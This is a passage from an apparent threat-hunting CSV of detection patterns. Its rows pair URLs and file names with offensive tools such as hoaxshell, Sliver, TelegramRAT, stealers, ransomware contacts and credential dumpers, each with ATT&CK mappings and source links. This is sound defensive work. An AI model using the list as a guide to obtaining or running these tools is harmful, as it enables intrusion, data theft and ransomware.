Evasion","https://github.com/3gstudent/CLR-Injection","1","1","N/A","N/A","8","2","183","45","2021-04-17T01:39:32Z","2017-07-27T03:00:04Z","47900" "*https://raw.githubusercontent.com/*/test/master/msg.dll*",".{0,1000}https\:\/\/raw\.githubusercontent\.com\/.{0,1000}\/test\/master\/msg\.dll.{0,1000}","offensive_tool_keyword","CLR-Injection","Use CLR to inject all the .NET apps","T1055.009","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/3gstudent/CLR-Injection","1","1","N/A","N/A","8","2","183","45","2021-04-17T01:39:32Z","2017-07-27T03:00:04Z","47901" "*https://raw.githubusercontent.com/BlackArch/blackarch/master/mirror/mirror.lst*",".{0,1000}https\:\/\/raw\.githubusercontent\.com\/BlackArch\/blackarch\/master\/mirror\/mirror\.lst.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation 
OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","47902" "*https://raw.githubusercontent.com/KasRoudra/CamHacker*",".{0,1000}https\:\/\/raw\.githubusercontent\.com\/KasRoudra\/CamHacker.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","1","N/A","N/A","10","","N/A","","","","47903" "*https://raw.githubusercontent.com/KDot227/*",".{0,1000}https\:\/\/raw\.githubusercontent\.com\/KDot227\/.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","1","N/A","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","47904" "*https://raw.githubusercontent.com/stamparm/aux/master/fetch-some-list.txt*",".{0,1000}https\:\/\/raw\.githubusercontent\.com\/stamparm\/aux\/master\/fetch\-some\-list\.txt.{0,1000}","offensive_tool_keyword","fetch-some-proxies","Simple Python script for fetching ""some"" (usable) proxies","T1090 - T1071 - T1070","TA0002 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/stamparm/fetch-some-proxies","1","1","N/A","N/A","9","6","585","138","2023-03-15T09:14:25Z","2016-10-09T22:39:56Z","47905" "*https://reedarvin.thearvins.com/*",".{0,1000}https\:\/\/reedarvin\.thearvins\.com\/.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. 
This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","1","N/A","N/A","10","8","N/A","N/A","N/A","N/A","47908" "*https://saycheese*.serveo.net*",".{0,1000}https\:\/\/saycheese.{0,1000}\.serveo\.net.{0,1000}","offensive_tool_keyword","saycheese","Grab target's webcam shots by link","T1213 - T1071 - T1102 - T1123 - T1185 - T1200","TA0001 - TA0005 - TA0009 - TA0011","N/A","N/A","Phishing","https://github.com/hangetzzu/saycheese","1","1","N/A","N/A","9","10","1175","962","2024-06-18T23:39:41Z","2019-04-29T04:07:00Z","47918" "*https://sharpsploit.cobbr.io/api*",".{0,1000}https\:\/\/sharpsploit\.cobbr\.io\/api.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","1","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","47927" "*https://shop.hak5.org/pages/cloud-c2-feedback*",".{0,1000}https\:\/\/shop\.hak5\.org\/pages\/cloud\-c2\-feedback.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","1","N/A","N/A","10","9","N/A","N/A","N/A","N/A","47928" "*'https://slack.com/api/channels.create'*",".{0,1000}\'https\:\/\/slack\.com\/api\/channels\.create\'.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - 
T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","47931" "*https://sliver.sh/install*",".{0,1000}https\:\/\/sliver\.sh\/install.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","47932" "*https://sniff.su/*.gz*",".{0,1000}https\:\/\/sniff\.su\/.{0,1000}\.gz.{0,1000}","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","47933" "*https://sniff.su/*.zip*",".{0,1000}https\:\/\/sniff\.su\/.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","47934" "*https://sourceforge.net/projects/winexe*",".{0,1000}https\:\/\/sourceforge\.net\/projects\/winexe.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","1","#linux #windows","N/A","8","8","N/A","N/A","N/A","N/A","47935" "*https://sped.lol/*",".{0,1000}https\:\/\/sped\.lol\/.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch 
obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","1","N/A","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","47937" "*https://SSHamble.com/*",".{0,1000}https\:\/\/SSHamble\.com\/.{0,1000}","offensive_tool_keyword","sshamble","SSHamble is a research tool for analyzing SSH implementations focusing on attacks against authentication - timing analysis and post-session enumeration.","T1021 - T1040 - T1592 - T1033","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/runZeroInc/sshamble","1","1","N/A","N/A","10","10","946","74","2025-04-07T15:08:38Z","2024-07-27T20:32:10Z","47938" "*https://sysdig.com/blog/hiding-linux-processes-for-fun-and-profit/*",".{0,1000}https\:\/\/sysdig\.com\/blog\/hiding\-linux\-processes\-for\-fun\-and\-profit\/.{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","1","#linux","N/A","9","10","1061","320","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z","47944" "*https://t.me/BotFather*",".{0,1000}https\:\/\/t\.me\/BotFather.{0,1000}","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","N/A","10","10","372","62","2024-01-23T12:05:59Z","2023-06-30T10:59:55Z","47945" "*https://t.me/eightbase*",".{0,1000}https\:\/\/t\.me\/eightbase.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","47946" 
"*https://t.me/encrypthub*",".{0,1000}https\:\/\/t\.me\/encrypthub.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","1","N/A","N/A","10","7","N/A","N/A","N/A","N/A","47947" "*https://t.me/machine1337*",".{0,1000}https\:\/\/t\.me\/machine1337.{0,1000}","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","N/A","10","10","372","62","2024-01-23T12:05:59Z","2023-06-30T10:59:55Z","47948" "*https://t.me/MegaMedusaLog*",".{0,1000}https\:\/\/t\.me\/MegaMedusaLog.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","47949" "*https://t.me/moom825*",".{0,1000}https\:\/\/t\.me\/moom825.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","47950" "*https://t.me/NovaGroup2023*",".{0,1000}https\:\/\/t\.me\/NovaGroup2023.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","47951" "*https://t.me/peass*",".{0,1000}https\:\/\/t\.me\/peass.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","1","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","47952" "*https://t.me/ransom_house*",".{0,1000}https\:\/\/t\.me\/ransom_house.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","47953" "*https://thc.org/hs*",".{0,1000}https\:\/\/thc\.org\/hs.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","1","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","47961" 
"*https://tor2web.*","https\:\/\/tor2web\..{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","47964" "*https://transfer.sh/get/*/*.pdf*",".{0,1000}https\:\/\/transfer\.sh\/get\/.{0,1000}\/.{0,1000}\.pdf.{0,1000}","offensive_tool_keyword","transfer.sh","Downloading pdf from transfer.sh","T1105 - T1204 - T1071 - T1195","TA0002 - TA0005 - TA0006","N/A","Black Basta","Collection","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","1","#filehostingservice","N/A","10","8","N/A","N/A","N/A","N/A","47968" "*https://transfer.sh/get/*/*.py*","https\:\/\/transfer\.sh\/get\/.{0,1000}\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","transfer.sh","Downloading python scripts from transfer.sh","T1105 - T1204 - T1071 - T1195","TA0002 - TA0005 - TA0006","N/A","Black Basta","Collection","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","1","#filehostingservice","N/A","10","8","N/A","N/A","N/A","N/A","47969" "*https://trufflesecurity.com/canaries*",".{0,1000}https\:\/\/trufflesecurity\.com\/canaries.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","1","#linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","47972" "*https://tuns.sh*",".{0,1000}https\:\/\/tuns\.sh.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. 
HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","1","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","47976" "*https://unit259.fyi/db*",".{0,1000}https\:\/\/unit259\.fyi\/db.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","1","N/A","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","47980" "*https://viperone.gitbook.io/pentest-everything*",".{0,1000}https\:\/\/viperone\.gitbook\.io\/pentest\-everything.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","1","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","47985" "*https://watch-youtube-videos-live*",".{0,1000}https\:\/\/watch\-youtube\-videos\-live.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. 
If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","47986" "*https://weakpass.com/*",".{0,1000}https\:\/\/weakpass\.com\/.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","47988" "*https://web.archive.org/*https://www.kernel-exploits.com/media/*",".{0,1000}https\:\/\/web\.archive\.org\/.{0,1000}https\:\/\/www\.kernel\-exploits\.com\/media\/.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","47989" "*https://wfuzz.readthedocs.io*",".{0,1000}https\:\/\/wfuzz\.readthedocs\.io.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","47993" "*https://whoamianony.top/posts/*",".{0,1000}https\:\/\/whoamianony\.top\/posts\/.{0,1000}","offensive_tool_keyword","SharpRODC","audit the security of read-only domain controllers","T1012 - T1482 - T1207 - T1208 - T1209 - T1212","TA0007 - TA0008 - TA0006","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpRODC","1","1","N/A","N/A","8","2","115","8","2023-11-27T12:41:52Z","2023-11-24T14:35:49Z","47994" 
"*https://www.1secmail.com/api/v1/?action=getDomainList*",".{0,1000}https\:\/\/www\.1secmail\.com\/api\/v1\/\?action\=getDomainList.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","47995" "*https://www.1secmail.com/api/v1/?action=getMessages&login=*",".{0,1000}https\:\/\/www\.1secmail\.com\/api\/v1\/\?action\=getMessages\&login\=.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","47996" "*https://www.1secmail.com/api/v1/?action=readMessage&login=*",".{0,1000}https\:\/\/www\.1secmail\.com\/api\/v1\/\?action\=readMessage\&login\=.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","47997" "*https://www.blackarch.org/blackarch/blackarch/lastupdate*",".{0,1000}https\:\/\/www\.blackarch\.org\/blackarch\/blackarch\/lastupdate.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation 
OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","48000" "*https://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz*",".{0,1000}https\:\/\/www\.blackhillsinfosec\.com\/bypass\-anti\-virus\-run\-mimikatz.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/projectb-temp/mimidogz","1","1","N/A","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z","48001" "*https://www.browserling.com/browse*",".{0,1000}https\:\/\/www\.browserling\.com\/browse.{0,1000}","offensive_tool_keyword","browserling","proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","browserling.com","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","48002" "*https://www.exploit-db.com/exploits/41607*",".{0,1000}https\:\/\/www\.exploit\-db\.com\/exploits\/41607.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement","https://github.com/bohops/SharpRDPHijack","1","0","#content","N/A","10","5","480","80","2024-11-28T06:08:58Z","2020-07-06T02:59:46Z","48007" "*https://www.hashkill.com*",".{0,1000}https\:\/\/www\.hashkill\.com.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","48010" 
"*https://www.joeware.net/downloads/dl2.php*",".{0,1000}https\:\/\/www\.joeware\.net\/downloads\/dl2\.php.{0,1000}","offensive_tool_keyword","NetSess","Command line tool to enumerate NetBIOS sessions on a specified local or remote machine. ","T1016 - T1046 - T1087","TA0007 - TA0043","N/A","MUSTANG PANDA","Discovery","https://www.joeware.net/freetools/tools/netsess/","1","1","N/A","could be any joeware softwares","7","9","N/A","N/A","N/A","N/A","48011" "*https://www.myget.org/F/fireeye/api/v2*",".{0,1000}https\:\/\/www\.myget\.org\/F\/fireeye\/api\/v2.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","N/A","10","7168","1313","2024-09-24T19:14:18Z","2019-03-26T22:36:32Z","48015" "*https://www.nirsoft.net/utils/webcamimagesave.zip*","https\:\/\/www\.nirsoft\.net\/utils\/webcamimagesave\.zip","offensive_tool_keyword","nirsoft","designed to capture webcam images","T1125 - T1056.004 - T1140","TA0005 - TA0006","N/A","N/A","Collection","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","1","N/A","N/A","10","8","N/A","N/A","N/A","N/A","48021" "*https://www.somd5.com*",".{0,1000}https\:\/\/www\.somd5\.com.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","48029" "*https://www.sordum.org/downloads/?st-defender-control*",".{0,1000}https\:\/\/www\.sordum\.org\/downloads\/\?st\-defender\-control.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense 
Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","48030" "*https://www.synacktiv.com/publications/ounedpy-exploiting-hidden-organizational-units-acl-attack-vectors-in-active-directory*",".{0,1000}https\:\/\/www\.synacktiv\.com\/publications\/ounedpy\-exploiting\-hidden\-organizational\-units\-acl\-attack\-vectors\-in\-active\-directory.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","1","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","48031" "*https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/*",".{0,1000}https\:\/\/www\.trustedsec\.com\/blog\/abusing\-windows\-telemetry\-for\-persistence\/.{0,1000}","offensive_tool_keyword","Telemetry","Abusing Windows Telemetry for persistence through registry modifications and scheduled tasks to execute arbitrary commands with system-level privileges.","T1053 - T1547 - T1059","TA0003 - TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/Imanfeng/Telemetry","1","1","N/A","N/A","9","2","140","13","2020-07-02T09:41:27Z","2020-06-24T16:30:44Z","48033" "*https://www.win-rar.co/panel/*",".{0,1000}https\:\/\/www\.win\-rar\.co\/panel\/.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","1","N/A","N/A","10","7","N/A","N/A","N/A","N/A","48034" 
"*https://www.youtube.com/watch?v=2eHsnZ4BeDI*",".{0,1000}https\:\/\/www\.youtube\.com\/watch\?v\=2eHsnZ4BeDI.{0,1000}","offensive_tool_keyword","ZeroHVCI","Achieve arbitrary kernel read/writes/function calling in Hypervisor-Protected Code Integrity (HVCI) protected environments calling without admin permissions or kernel drivers - CVE-2024-26229","T1068 - T1564 - T1014 - T1499","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zer0condition/ZeroHVCI","1","0","N/A","N/A","7","2","198","43","2024-10-26T17:08:38Z","2024-07-20T07:29:18Z","48037" "*https://www.youtube.com/watch?v=9_fJv_weLU0*",".{0,1000}https\:\/\/www\.youtube\.com\/watch\?v\=9_fJv_weLU0.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","48038" "*https://youareanidiot.cc*",".{0,1000}https\:\/\/youareanidiot\.cc.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","1","N/A","N/A","10","","N/A","","","","48039" "*https://YOURREDIRECTWEBSERVER.azurewebsites.net*",".{0,1000}https\:\/\/YOURREDIRECTWEBSERVER\.azurewebsites\.net.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph 
API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","1","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","48040" "*https_payload_localtunnel.ps1*",".{0,1000}https_payload_localtunnel\.ps1.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","48044" "*https_payload_localtunnel_outfile.ps1*",".{0,1000}https_payload_localtunnel_outfile\.ps1.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","48045" "*https_payload_ngrok.ps1*",".{0,1000}https_payload_ngrok\.ps1.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","48046" "*https_payload_ngrok_outfile.ps1*",".{0,1000}https_payload_ngrok_outfile\.ps1.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. 
